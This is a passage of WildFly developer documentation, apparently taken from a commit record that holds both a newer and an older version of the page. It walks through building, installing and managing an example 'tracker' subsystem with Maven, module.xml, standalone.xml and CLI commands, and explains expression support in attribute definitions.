`src\/main\/resources\/module\/main\/module.xml`\nand is used to define your module. It says that it contains the\n`acme-subsystem.jar`:\n\n[source,xml,options=\"nowrap\"]\n----\n<module xmlns=\"urn:jboss:module:1.0\" name=\"com.acme.corp.tracker\">\n <resources>\n <resource-root path=\"acme-subsystem.jar\"\/>\n <\/resources>\n----\n\nAnd has a default set of dependencies needed by every subsystem created.\nIf your subsystem requires additional module dependencies you can add\nthem here before building and installing.\n\n[source,xml,options=\"nowrap\"]\n----\n <dependencies>\n <module name=\"javax.api\"\/>\n <module name=\"org.jboss.staxmapper\"\/>\n <module name=\"org.jboss.as.controller\"\/>\n <module name=\"org.jboss.as.server\"\/>\n <module name=\"org.jboss.modules\"\/>\n <module name=\"org.jboss.msc\"\/>\n <module name=\"org.jboss.logging\"\/>\n <module name=\"org.jboss.vfs\"\/>\n <\/dependencies>\n<\/module>\n----\n\nNote that the name of the module corresponds to the directory structure\ncontaining it. Now copy the `target\/module\/com\/acme\/corp\/tracker\/main\/`\ndirectory and its contents to\n`$WFLY\/modules\/com\/acme\/corp\/tracker\/main\/` (where `$WFLY` is the root\nof your WildFly install).\n\nNext we need to modify `$WFLY\/standalone\/configuration\/standalone.xml`.\nFirst we need to add our new module to the `<extensions>` section:\n\n[source,java,options=\"nowrap\"]\n----\n <extensions>\n ...\n <extension module=\"org.jboss.as.weld\"\/>\n <extension module=\"com.acme.corp.tracker\"\/>\n <\/extensions>\n----\n\nAnd then we have to add our subsystem to the `<profile>` section:\n\n[source,xml,options=\"nowrap\"]\n----\n <profile>\n ...\n\u00a0\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n <\/subsystem>\n ...\n <\/profile>\n----\n\nAdding this to a managed domain works exactly the same apart from in\nthis case you need to modify `$WFLY\/domain\/configuration\/domain.xml`.\n\nNow start up WildFly by running `$WFLY\/bin\/standalone.sh` and you should\nsee messages like these after the server has started, which means our\nsubsystem has been added and our `TrackerService` is working:\n\n....\n15:27:33,838 INFO [org.jboss.as] (Controller Boot Thread) JBoss AS 7.0.0.Final \"Lightning\" started in 2861ms - Started 94 of 149 services (55 services are passive or on-demand)\n15:27:42,966 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:42,966 INFO [stdout] (Thread-8) []\n15:27:42,967 INFO [stdout] (Thread-8) Cool: 0\n15:27:42,967 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:27:42,967 INFO [stdout] (Thread-9) []\n15:27:42,967 INFO [stdout] (Thread-9) Cool: 0\n15:27:52,967 INFO [stdout] (Thread-8) Current deployments deployed while sar tracking active:\n15:27:52,967 INFO [stdout] (Thread-8) []\n15:27:52,967 INFO [stdout] (Thread-8) Cool: 0\n....\n\nIf you run the command line interface you can execute some commands to\nsee more about the subsystem. For example\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource-description(recursive=true, operations=true)\n----\n\nwill return a lot of information, including what we provided in the\n`DescriptionProvider`s we created to document our subsystem.\n\nTo see the current subsystem state you can execute\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"war\" => {\"tick\" => 10000L},\n \"sar\" => {\"tick\" => 10000L}\n }}\n}\n----\n\nWe can remove both the deployment types which removes them from the\nmodel:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=sar:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:remove\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => undefined}\n}\n----\n\nYou should now see the output from the `TrackerService` instances having\nstopped.\n\nNow, let's add the war tracker again:\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:add\n{\"outcome\" => \"success\"}\n[standalone@localhost:9999 \/] \/subsystem=tracker\/:read-resource(recursive=true)\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\"war\" => {\"tick\" => 10000L}}}\n}\n----\n\nand the WildFly console should show the messages coming from the war\n`TrackerService` again.\n\nNow let us deploy something. You can find two maven projects for test\nwars already built at link:downloads\/test1.zip[test1.zip] and\nlink:downloads\/test2.zip[test2.zip]. If you download them and\nextract them to `\/Downloads\/test1` and `\/Downloads\/test2`, you can see\nthat `\/Downloads\/test1\/target\/test1.war` contains a `META-INF\/cool.txt`\nwhile `\/Downloads\/test2\/target\/test2.war` does not contain that file.\nFrom CLI deploy `test1.war` first:\n\n[source,java,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/Downloads\/test1\/target\/test1.war\n'test1.war' deployed successfully.\n----\n\nAnd you should now see the output from the war `TrackerService` list the\ndeployments:\n\n....\n15:35:03,712 INFO [org.jboss.as.server.deployment] (MSC service thread 1-2) Starting deployment of \"test1.war\"\n15:35:03,988 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test1\n15:35:03,996 INFO [org.jboss.as.server.controller] (pool-2-thread-9) Deployed \"test1.war\"\n15:35:13,056 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:35:13,056 INFO [stdout] (Thread-9) [test1.war]\n15:35:13,057 INFO [stdout] (Thread-9) Cool: 1\n....\n\nSo our `test1.war` got picked up as a 'cool' deployment. Now if we\ndeploy `test2.war`\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] deploy ~\/sourcecontrol\/temp\/archetype-test\/test2\/target\/test2.war\n'test2.war' deployed successfully.\n----\n\nYou will see that deployment get picked up as well but since there is no\n`META-INF\/cool.txt` it is not marked as a 'cool' deployment:\n\n....\n15:37:05,634 INFO [org.jboss.as.server.deployment] (MSC service thread 1-4) Starting deployment of \"test2.war\"\n15:37:05,699 INFO [org.jboss.web] (MSC service thread 1-1) registering web context: \/test2\n15:37:05,982 INFO [org.jboss.as.server.controller] (pool-2-thread-15) Deployed \"test2.war\"\n15:37:13,075 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:37:13,075 INFO [stdout] (Thread-9) [test1.war, test2.war]\n15:37:13,076 INFO [stdout] (Thread-9) Cool: 1\n....\n\nAn undeploy\n\n[source,java,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] undeploy test1.war\nSuccessfully undeployed test1.war.\n----\n\nis also reflected in the `TrackerService` output:\n\n....\n15:38:47,901 INFO [org.jboss.as.server.controller] (pool-2-thread-21) Undeployed \"test1.war\"\n15:38:47,934 INFO [org.jboss.as.server.deployment] (MSC service thread 1-3) Stopped deployment test1.war in 40ms\n15:38:53,091 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:38:53,092 INFO [stdout] (Thread-9) [test2.war]\n15:38:53,092 INFO [stdout] (Thread-9) Cool: 0\n....\n\nFinally, we registered a write attribute handler for the `tick` property\nof the `type` so we can change the frequency\n\n[source,options=\"nowrap\"]\n----\n[standalone@localhost:9999 \/] \/subsystem=tracker\/type=war:write-attribute(name=tick,value=1000)\n{\"outcome\" => \"success\"}\n----\n\nYou should now see the output from the `TrackerService` happen every\nsecond\n\n....\n15:39:43,100 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:43,100 INFO [stdout] (Thread-9) [test2.war]\n15:39:43,101 INFO [stdout] (Thread-9) Cool: 0\n15:39:44,101 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:44,102 INFO [stdout] (Thread-9) [test2.war]\n15:39:44,105 INFO [stdout] (Thread-9) Cool: 0\n15:39:45,106 INFO [stdout] (Thread-9) Current deployments deployed while war tracking active:\n15:39:45,106 INFO [stdout] (Thread-9) [test2.war]\n....\n\nIf you open `$WFLY\/standalone\/configuration\/standalone.xml` you can see\nthat our subsystem entry reflects the current state of the subsystem:\n\n[source,xml,options=\"nowrap\"]\n----\n <subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"war\" tick=\"1000\"\/>\n <\/deployment-types>\n <\/subsystem>\n----\n\n[[expressions]]\n== Expressions\n\nExpressions are mechanism that enables you to support variables in your\nattributes, for instance when you want the value of attribute to be\nresolved using system \/ environment properties.\n\nAn example expression is\n\n....\n${jboss.bind.address.management:127.0.0.1}\n....\n\nwhich means that the value should be taken from a system property named\n`jboss.bind.address.management` and if it is not defined use\n`127.0.0.1`.\n\n[[what-expression-types-are-supported]]\n=== What expression types are supported\n\n* System properties, which are resolved using\n`java.lang.System.getProperty(String key)`\n* Environment properties, which are resolved using\n`java.lang.System.getEnv(String name)`.\n* Security vault expressions, resolved against the security vault\nconfigured for the server or Host Controller that needs to resolve the\nexpression.\n\nIn all cases, the syntax for the expression is\n\n....\n${expression_to_resolve}\n....\n\nFor an expression meant to be resolved against environment properties,\nthe `expression_to_resolve` must be prefixed with `env.`. The portion\nafter `env.` will be the name passed to\n`java.lang.System.getEnv(String name)`.\n\nSecurity vault expressions do not support default values (i.e. the\n`127.0.0.1` in the `jboss.bind.address.management:127.0.0.1` example\nabove.)\n\n[[how-to-support-expressions-in-subsystems]]\n=== How to support expressions in subsystems\n\nThe easiest way is by using AttributeDefinition, which provides support\nfor expressions just by using it correctly.\n\nWhen we create an AttributeDefinition all we need to do is mark that is\nallows expressions. Here is an example how to define an attribute that\nallows expressions to be used.\n\n[source,java,options=\"nowrap\"]\n----\nSimpleAttributeDefinition MY_ATTRIBUTE =\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 new SimpleAttributeDefinitionBuilder(\"my-attribute\", ModelType.INT, true)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0 .setAllowExpression(true)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .setFlags(AttributeAccess.Flag.RESTART_ALL_SERVICES)\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .setDefaultValue(new ModelNode(1))\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 .build();\n----\n\nThen later when you are parsing the xml configuration you should use the\nMY_ATTRIBUTE attribute definition to set the value to the management\noperation ModelNode you are creating.\n\n[source,java,options=\"nowrap\"]\n----\n....\n\u00a0\u00a0\u00a0\u00a0\u00a0 String attr = reader.getAttributeLocalName(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0 String value = reader.getAttributeValue(i);\n\u00a0\u00a0\u00a0\u00a0\u00a0 if (attr.equals(\"my-attribute\")) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.parseAndSetParameter(value, operation, reader);\n\u00a0\u00a0\u00a0\u00a0\u00a0 } else if (attr.equals(\"suffix\")) {\n.....\n----\n\nNote that this just helps you to properly set the value to the model\nnode you are working on, so no need to additionally set anything to the\nmodel for this attribute. Method parseAndSetParameter parses the value\nthat was read from xml for possible expressions in it and if it finds\nany it creates special model node that defines that node is of type\n`ModelType.EXPRESSION`.\n\nLater in your operation handlers where you implement populateModel and\nhave to store the value from the operation to the configuration model\nyou also use this MY_ATTRIBUTE attribute definition.\n\n[source,java,options=\"nowrap\"]\n----\n @Override\n\u00a0protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.validateAndSet(operation,model);\n\u00a0}\n----\n\nThis will make sure that the attribute that is stored from the operation\nto the model is valid and nothing is lost. It also checks the value\nstored in the operation `ModelNode`, and if it isn't already\n`ModelType.EXPRESSION`, it checks if the value is a string that contains\nthe expression syntax. If so, the value stored in the model will be of\ntype `ModelType.EXPRESSION`. Doing this ensures that expressions are\nproperly handled when they appear in operations that weren't created by\nthe subsystem parser, but are instead passed in from CLI or admin\nconsole users.\n\nAs last step we need to use the value of the attribute. This is usually\nneeded inside of the `performRuntime` method\n\n[source,java,options=\"nowrap\"]\n----\n protected void performRuntime(OperationContext context, ModelNode operation, ModelNode model, ServiceVerificationHandler verificationHandler, List<ServiceController<?>> newControllers) throws OperationFailedException {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ....\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 final int attributeValue = MY_ATTRIBUTE.resolveModelAttribute(context, model).asInt();\u00a0\u00a0\u00a0\u00a0\u00a0\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ...\n\u00a0\n\u00a0\u00a0\u00a0 }\n----\n\nAs you can see resolving of attribute's value is not done until it is\nneeded for use in the subsystem's runtime services. The resolved value\nis not stored in the configuration model, the unresolved expression is.\nThat way we do not lose any information in the model and can assure that\nalso marshalling is done properly, where we must marshall back the\nunresolved value.\n\nAttribute definitinon also helps you with that:\n\n[source,java,options=\"nowrap\"]\n----\n public void writeContent(XMLExtendedStreamWriter writer, SubsystemMarshallingContext context) throws XMLStreamException {\n\u00a0\u00a0\u00a0 ....\n\u00a0\u00a0\u00a0\u00a0\u00a0 MY_ATTRIBUTE.marshallAsAttribute(sessionData, writer);\n\u00a0\u00a0\u00a0\u00a0\u00a0 MY_OTHER_ATTRIBUTE.marshallAsElement(sessionData, false, writer);\n\u00a0\u00a0\u00a0 ...\n}\n----\n","old_contents":"[[Example_subsystem]]\n= Example subsystem\n\nOur example subsystem will keep track of all deployments of certain\ntypes containing a special marker file, and expose operations to see how\nlong these deployments have been deployed.\n\n[[create-the-skeleton-project]]\n== Create the skeleton project\n\nTo make your life easier we have provided a maven archetype which will\ncreate a skeleton project for implementing subsystems.\n\n[source,options=\"nowrap\"]\n----\nmvn archetype:generate \\\n -DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=http:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n----\n\nMaven will download the archetype and it's dependencies, and ask you\nsome questions:\n\n[source,options=\"nowrap\"]\n----\n$ mvn archetype:generate \\\n -DarchetypeArtifactId=wildfly-subsystem \\\n -DarchetypeGroupId=org.wildfly.archetypes \\\n -DarchetypeVersion=8.0.0.Final \\\n -DarchetypeRepository=http:\/\/repository.jboss.org\/nexus\/content\/groups\/public\n[INFO] Scanning for projects...\n[INFO]\n[INFO] ------------------------------------------------------------------------\n[INFO] Building Maven Stub Project (No POM) 1\n[INFO] ------------------------------------------------------------------------\n[INFO]\n\u00a0\n.........\n\u00a0\nDefine value for property 'groupId': : com.acme.corp\nDefine value for property 'artifactId': : acme-subsystem\nDefine value for property 'version': 1.0-SNAPSHOT: :\nDefine value for property 'package': com.acme.corp: : com.acme.corp.tracker\nDefine value for property 'module': : com.acme.corp.tracker\n[INFO] Using property: name = WildFly subsystem project\nConfirm properties configuration:\ngroupId: com.acme.corp\nartifactId: acme-subsystem\nversion: 1.0-SNAPSHOT\npackage: com.acme.corp.tracker\nmodule: com.acme.corp.tracker\nname: WildFly subsystem project\n Y: : Y\n[INFO] ------------------------------------------------------------------------\n[INFO] BUILD SUCCESS\n[INFO] ------------------------------------------------------------------------\n[INFO] Total time: 1:42.563s\n[INFO] Finished at: Fri Jul 08 14:30:09 BST 2011\n[INFO] Final Memory: 7M\/81M\n[INFO] ------------------------------------------------------------------------\n$\n----\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n| |Instruction\n\n|1 |Enter the groupId you wish to use\n\n|2 |Enter the artifactId you wish to use\n\n|3 |Enter the version you wish to use, or just hit Enter if you wish to\naccept the default 1.0-SNAPSHOT\n\n|4 |Enter the java package you wish to use, or just hit Enter if you\nwish to accept the default (which is copied from groupId ).\n\n|5 |Enter the module name you wish to use for your extension.\n\n|6 |Finally, if you are happy with your choices, hit Enter and Maven\nwill generate the project for you.\n|=======================================================================\n\nWe now have a skeleton project that you can use to\nimplement a subsystem. Import the \ufeff `acme-subsystem` project into your\nfavourite IDE. A nice side-effect of running this in the IDE is that you\ncan see the javadoc of WildFly classes and interfaces imported by the\nskeleton code. If you do a `mvn install` in the project it will work if\nwe plug it into WildFly, but before doing that we will change it to do\nsomething more useful.\n\nThe rest of this section modifies the skeleton project created by the\narchetype to do something more useful, and the full code can be found in\nlink:downloads\/acme-subsystem.zip[acme-subsystem.zip].\n\nIf you do a `mvn install` in the created project, you will see some\ntests being run\n\n[source,options=\"nowrap\"]\n----\n$mvn install\n[INFO] Scanning for projects...\n[...]\n[INFO] Surefire report directory: \/Users\/kabir\/sourcecontrol\/temp\/archetype-test\/acme-subsystem\/target\/surefire-reports\n\u00a0\n-------------------------------------------------------\n T E S T S\n-------------------------------------------------------\nRunning com.acme.corp.tracker.extension.SubsystemBaseParsingTestCase\nTests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.424 sec\nRunning com.acme.corp.tracker.extension.SubsystemParsingTestCase\nTests run: 6, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.074 sec\n\u00a0\nResults :\n\u00a0\nTests run: 3, Failures: 0, Errors: 0, Skipped: 0\n[...]\n----\n\nWe will talk about these later in the\n<<testing-the-parsers,#Testing the\nparsers>> section.\n\n[[create-the-schema]]\n== Create the schema\n\nFirst, let us define the schema for our subsystem. Rename\n`src\/main\/resources\/schema\/mysubsystem.xsd` to\n`src\/main\/resources\/schema\/acme.xsd`. Then open `acme.xsd` and modify it\nto the following\n\n[source,xml,options=\"nowrap\"]\n----\n<xs:schema xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n targetNamespace=\"urn:com.acme.corp.tracker:1.0\"\n xmlns=\"urn:com.acme.corp.tracker:1.0\"\n elementFormDefault=\"qualified\"\n attributeFormDefault=\"unqualified\"\n version=\"1.0\">\n\u00a0\n <!-- The subsystem root element -->\n <xs:element name=\"subsystem\" type=\"subsystemType\"\/>\n <xs:complexType name=\"subsystemType\">\n <xs:all>\n <xs:element name=\"deployment-types\" type=\"deployment-typesType\"\/>\n <\/xs:all>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typesType\">\n <xs:choice minOccurs=\"0\" maxOccurs=\"unbounded\">\n <xs:element name=\"deployment-type\" type=\"deployment-typeType\"\/>\n <\/xs:choice>\n <\/xs:complexType>\n <xs:complexType name=\"deployment-typeType\">\n <xs:attribute name=\"suffix\" use=\"required\"\/>\n <xs:attribute name=\"tick\" type=\"xs:long\" use=\"optional\" default=\"10000\"\/>\n <\/xs:complexType>\n<\/xs:schema>\n----\n\nNote that we modified the `xmlns` and `targetNamespace` values to \ufeff\n`urn.com.acme.corp.tracker:1.0`. Our new `subsystem` element has a child\ncalled `deployment-types`, which in turn can have zero or more children\ncalled `deployment-type`. Each `deployment-type` has a required `suffix`\nattribute, and a `tick` attribute which defaults to `true.`\n\nNow modify the \ufeff `com.acme.corp.tracker.extension.SubsystemExtension`\nclass to contain the new namespace.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n\u00a0\n \/** The name space used for the {@code substystem} element *\/\n public static final String NAMESPACE = \"urn:com.acme.corp.tracker:1.0\";\n ...\n----\n\n[[design-and-define-the-model-structure]]\n== Design and define the model structure\n\nThe following example xml contains a valid subsystem configuration, we\nwill see how to plug this in to WildFly later in this tutorial.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:com.acme.corp.tracker:1.0\">\n <deployment-types>\n <deployment-type suffix=\"sar\" tick=\"10000\"\/>\n <deployment-type suffix=\"war\" tick=\"10000\"\/>\n <\/deployment-types>\n<\/subsystem>\n----\n\nNow when designing our model, we can either do a one to one mapping\nbetween the schema and the model or come up with something slightly or\nvery different. To keep things simple, let us stay pretty true to the\nschema so that when executing a `:read-resource(recursive=true)` against\nour subsystem we'll see something like:\n\n[source,options=\"nowrap\"]\n----\n{\n \"outcome\" => \"success\",\n \"result\" => {\"type\" => {\n \"sar\" => {\"tick\" => \"10000\"},\n \"war\" => {\"tick\" => \"10000\"}\n }}\n}\n----\n\nEach `deployment-type` in the xml becomes in the model a child resource\nof the subsystem's root resource. The child resource's child-type is\n`type`, and it is indexed by its `suffix`. Each `type` resource then\ncontains the `tick` attribute.\n\nWe also need a name for our subsystem, to do that change\n`com.acme.corp.tracker.extension.SubsystemExtension`:\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemExtension implements Extension {\n ...\n \/** The name of our subsystem within the model. *\/\n public static final String SUBSYSTEM_NAME = \"tracker\";\n ...\n----\n\nOnce we are finished our subsystem will be available under\n`\/subsystem=tracker`.\n\nThe `SubsystemExtension.initialize()` method defines the model,\ncurrently it sets up the basics to add our subsystem to the model:\n\n[source,java,options=\"nowrap\"]\n----\n@Override\n public void initialize(ExtensionContext context) {\n \/\/register subsystem with its model version\n\u00a0 final SubsystemRegistration subsystem = context.registerSubsystem(SUBSYSTEM_NAME, 1, 0);\n \/\/register subsystem model with subsystem definition that defines all attributes and operations\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 final ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n \/\/register describe operation, note that this can be also registered in SubsystemDefinition\n registration.registerOperationHandler(DESCRIBE, GenericSubsystemDescribeHandler.INSTANCE, GenericSubsystemDescribeHandler.INSTANCE, false, OperationEntry.EntryType.PRIVATE);\n\u00a0 \/\/we can register additional submodels here\n \/\/\n subsystem.registerXMLElementWriter(parser);\n }\n----\n\nThe `registerSubsystem()` call registers our subsystem with the\nextension context. At the end of the method we register our parser with\nthe returned `SubsystemRegistration` to be able to marshal our\nsubsystem's model back to the main configuration file when it is\nmodified. We will add more functionality to this method later.\n\n[[registering-the-core-subsystem-model]]\n=== Registering the core subsystem model\n\nNext we obtain a `ManagementResourceRegistration` by registering the\nsubsystem model. This is a *compulsory* step for every new subsystem.\n\n[source,java,options=\"nowrap\"]\n----\nfinal ManagementResourceRegistration registration = subsystem.registerSubsystemModel(SubsystemDefinition.INSTANCE);\n----\n\nIts parameter is an implementation of the `ResourceDefinition`\ninterface, which means that when you call\n`\/subsystem=tracker:read-resource-description` the information you see\ncomes from model that is defined by `SubsystemDefinition.INSTANCE`.\n\n[source,java,options=\"nowrap\"]\n----\npublic class SubsystemDefinition extends SimpleResourceDefinition {\n\u00a0\u00a0\u00a0 public static final SubsystemDefinition INSTANCE = new SubsystemDefinition();\n\u00a0\n\u00a0\u00a0\u00a0 private SubsystemDefinition() {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 super(SubsystemExtension.SUBSYSTEM_PATH,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemExtension.getResourceDescriptionResolver(null),\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/We always need to add an 'add' operation\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemAdd.INSTANCE,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/Every resource that is added, normally needs a remove operation\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 SubsystemRemove.INSTANCE);\n\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0 @Override\n\u00a0\u00a0\u00a0 public void registerOperations(ManagementResourceRegistration resourceRegistration) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 super.registerOperations(resourceRegistration);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/you can register aditional operations here\n\u00a0\u00a0\u00a0 }\n\u00a0\n\u00a0\u00a0\u00a0 @Override\n\u00a0\u00a0\u00a0 public void registerAttributes(ManagementResourceRegistration resourceRegistration) {\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \/\/you can register attributes here\n\u00a0\u00a0\u00a0 }\n}\n----\n\nSince we need child resource `type` we need to add new\nResourceDefinition,\n\nThe `ManagementResourceRegistration` obtained in\n`SubsystemExtension.initialize()` is then used to add additional\noperations or to register submodels to the `\/subsystem=tracker` address.\nEvery subsystem and resource *must* have an `ADD` method which can be\nachieved by the following line inside `registerOperations` in your\n`ResourceDefinition` or by providing it in constructor of your\n`SimpleResourceDefinition` just as we did in example above.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/We always need to add an 'add' operation\n resourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nThe parameters when registering an operation handler are:\n\n1. *The name* - i.e. `ADD`.\n2. The handler instance - we will talk more about this below\n3. The handler description provider - we will talk more about this\nbelow.\n4. Whether this operation handler is inherited - `false` means that\nthis operation is not inherited, and will only apply to\n`\/subsystem=tracker`. The content for this operation handler will be\nprovided by `3`.\n\nLet us first look at the description provider which is quite simple\nsince this operation takes no parameters. The addition of `type`\nchildren will be handled by another operation handler, as we will see\nlater on.\n\nThere are two way to define `DescriptionProvider`, one is by defining it\nby hand using ModelNode, but as this has show to be very error prone\nthere are lots of helper methods to help you automatically describe the\nmodel. Following example is done by manually defining Description\nprovider for ADD operation handler\n\n[source,java,options=\"nowrap\"]\n----\n\/**\n * Used to create the description of the subsystem add method\n *\/\n public static DescriptionProvider SUBSYSTEM_ADD = new DescriptionProvider() {\n public ModelNode getModelDescription(Locale locale) {\n \/\/The locale is passed in so you can internationalize the strings used in the descriptions\n\u00a0\n final ModelNode subsystem = new ModelNode();\n subsystem.get(OPERATION_NAME).set(ADD);\n subsystem.get(DESCRIPTION).set(\"Adds the tracker subsystem\");\n\u00a0\n return subsystem;\n }\n };\n----\n\nOr you can use API that helps you do that for you. For Add and Remove\nmethods there are classes `DefaultResourceAddDescriptionProvider` and\n`DefaultResourceRemoveDescriptionProvider` that do work for you. In case\nyou use `SimpleResourceDefinition` even that part is hidden from you.\n\n[source,java,options=\"nowrap\"]\n----\nresourceRegistration.registerOperationHandler(ADD, SubsystemAdd.INSTANCE, new DefaultResourceAddDescriptionProvider(resourceRegistration,descriptionResolver), false);\nresourceRegistration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, new DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver), false);\n----\n\nFor other operation handlers that are not add\/remove you can use\n`DefaultOperationDescriptionProvider` that takes additional parameter of\nwhat is the name of operation and optional array of\nparameters\/attributes operation takes. This is an example to register\noperation \" `add-mime`\" with two parameters:\n\n[source,java,options=\"nowrap\"]\n----\ncontainer.registerOperationHandler(\"add-mime\",\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 MimeMappingAdd.INSTANCE,\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 new DefaultOperationDescriptionProvider(\"add-mime\", Extension.getResourceDescriptionResolver(\"container.mime-mapping\"), MIME_NAME, MIME_VALUE));\n----\n\n[NOTE]\n\nWhen descriping an operation its description provider's `OPERATION_NAME`\nmust match the name used when calling\n`ManagementResourceRegistration.registerOperationHandler()`\n\nNext we have the actual operation handler instance, note that we have\nchanged its `populateModel()` method to initialize the `type` child of\nthe model.\n\n[source,java,options=\"nowrap\"]\n----\nclass SubsystemAdd extends AbstractBoottimeAddStepHandler {\n\u00a0\n static final SubsystemAdd INSTANCE = new SubsystemAdd();\n\u00a0\n private SubsystemAdd() {\n }\n\u00a0\n \/** {@inheritDoc} *\/\n @Override\n protected void populateModel(ModelNode operation, ModelNode model) throws OperationFailedException {\n log.info(\"Populating the model\");\n \/\/Initialize the 'type' child node\n model.get(\"type\").setEmptyObject();\n }\n ....\n----\n\n`SubsystemAdd` also has a `performBoottime()` method which is used for\ninitializing the deployer chain associated with this subsystem. We will\ntalk about the deployers later on. However, the basic idea for all\noperation handlers is that we do any model updates before changing the\nactual runtime state.\n\nThe rule of thumb is that every thing that can be added, can also be\nremoved so we have a remove handler for the subsystem registered +\nin `SubsystemDefinition.registerOperations` or just provide the\noperation handler in constructor.\n\n[source,java,options=\"nowrap\"]\n----\n\/\/Every resource that is added, normally needs a remove operation\n registration.registerOperationHandler(REMOVE, SubsystemRemove.INSTANCE, DefaultResourceRemoveDescriptionProvider(resourceRegistration,descriptionResolver) , false);\n----\n\n`SubsystemRemove` extends `AbstractRemoveStepHandler` which takes care\nof removing the resource from the model so we don't need to override its\n`performRemove()` operation, also the add handler did not install any\nservices (services will be discussed later) so we can delete the\n`performRuntime()` method generated by the 